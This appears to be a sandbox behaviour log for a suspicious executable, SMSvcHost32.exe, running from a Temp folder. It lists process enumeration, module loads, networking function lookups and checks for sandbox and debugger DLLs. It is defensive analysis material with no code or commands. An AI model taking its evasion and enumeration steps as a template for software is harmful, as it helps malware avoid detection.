| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
64 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
32 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
224 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
112 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
106 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
10 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
150 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
75 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
28 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
14 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
|
For performance reasons, the remaining 1 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Module (4533)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | WININET.dll | base_address = 0x702b0000 |
|
1 | |
| Load | PSAPI.DLL | base_address = 0x772c0000 |
|
1 | |
| Load | USERENV.dll | base_address = 0x701e0000 |
|
1 | |
| Load | WINHTTP.dll | base_address = 0x70210000 |
|
1 | |
| Load | NETAPI32.dll | base_address = 0x77490000 |
|
1 | |
| Load | Secur32.dll | base_address = 0x6ff60000 |
|
1 | |
| Load | SHELL32.dll | base_address = 0x75120000 |
|
1 | |
| Load | RPCRT4.dll | base_address = 0x75070000 |
|
1 | |
| Load | ntdll.dll | base_address = 0x77960000 |
|
4 | |
| Load | kernel32.dll | base_address = 0x765a0000 |
|
1 | |
| Load | advapi32 | base_address = 0x74aa0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\eappcfg.dll | base_address = 0x6ffa0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x765a0000 |
|
2134 | |
| Get Handle | WININET.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\shlwapi.dll | base_address = 0x74b20000 |
|
1 | |
| Get Handle | PSAPI.DLL | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\ntdll.dll | base_address = 0x77960000 |
|
1 | |
| Get Handle | USERENV.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\ws2_32.dll | base_address = 0x746c0000 |
|
1 | |
| Get Handle | WINHTTP.dll | base_address = 0x0 |
|
1 | |
| Get Handle | NETAPI32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x77810000 |
|
1 | |
| Get Handle | c:\windows\syswow64\advapi32.dll | base_address = 0x74aa0000 |
|
1 | |
| Get Handle | Secur32.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\shell32.dll | base_address = 0x75120000 |
|
1 | |
| Get Handle | c:\windows\syswow64\ole32.dll | base_address = 0x771d0000 |
|
1 | |
| Get Handle | c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | base_address = 0x400000 |
|
4 | |
| Get Handle | dbghelp.dll | base_address = 0x0 |
|
1 | |
| Get Handle | sbiedll.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\windows\syswow64\wininet.dll | base_address = 0x702b0000 |
|
6 | |
| Get Filename | Secur32.dll | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77992bd0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x765b1ba0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount, address_out = 0x765c5eb0 |
|
2 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpQueryInfoA, address_out = 0x70351880 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetQueryOptionA, address_out = 0x70357d00 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetSetOptionA, address_out = 0x70351dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpAddRequestHeadersA, address_out = 0x7032c3f0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetCloseHandle, address_out = 0x7037d200 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpSendRequestA, address_out = 0x70378e60 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetConnectA, address_out = 0x703f0da0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetReadFile, address_out = 0x70337320 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpAddRequestHeadersW, address_out = 0x7032bec0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetOpenW, address_out = 0x70378490 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpOpenRequestW, address_out = 0x70330fd0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = PathFindFileNameW, address_out = 0x74b37a50 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCatW, address_out = 0x74b484a0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCpyW, address_out = 0x74b484e0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCmpIW, address_out = 0x74b34750 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCpyNW, address_out = 0x74b433f0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrStrA, address_out = 0x74b43570 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrDupW, address_out = 0x74b39060 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrStrIW, address_out = 0x74b381b0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrRChrW, address_out = 0x74b3d1c0 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrCmpW, address_out = 0x74b35fe0 |
|
1 | |
| Get Address | c:\windows\syswow64\psapi.dll | function = GetProcessImageFileNameA, address_out = 0x772c16a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = _chkstk, address_out = 0x779da570 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlAllocateHeap, address_out = 0x77992bd0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlFreeHeap, address_out = 0x77990230 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = memset, address_out = 0x779dcfe0 |
|
1 | |
| Get Address | c:\windows\syswow64\userenv.dll | function = CreateEnvironmentBlock, address_out = 0x701e4480 |
|
1 | |
| Get Address | c:\windows\syswow64\userenv.dll | function = GetProfilesDirectoryW, address_out = 0x701e45a0 |
|
1 | |
| Get Address | c:\windows\syswow64\userenv.dll | function = DestroyEnvironmentBlock, address_out = 0x701e4510 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 52, address_out = 0x746f1110 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 2, address_out = 0x746d3230 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 3, address_out = 0x746cead0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 11, address_out = 0x746c5240 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 23, address_out = 0x746ce6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 15, address_out = 0x746c4a90 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 115, address_out = 0x746c6520 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpQueryDataAvailable, address_out = 0x702347a0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpReceiveResponse, address_out = 0x7021c8e0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpOpen, address_out = 0x70246720 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpAddRequestHeaders, address_out = 0x70229400 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpQueryHeaders, address_out = 0x702309c0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpReadData, address_out = 0x70234ea0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpOpenRequest, address_out = 0x70248dd0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpSetOption, address_out = 0x702306f0 |
|
1 | |
| Get Address | c:\windows\syswow64\winhttp.dll | function = WinHttpCloseHandle, address_out = 0x70233ad0 |
|
1 | |
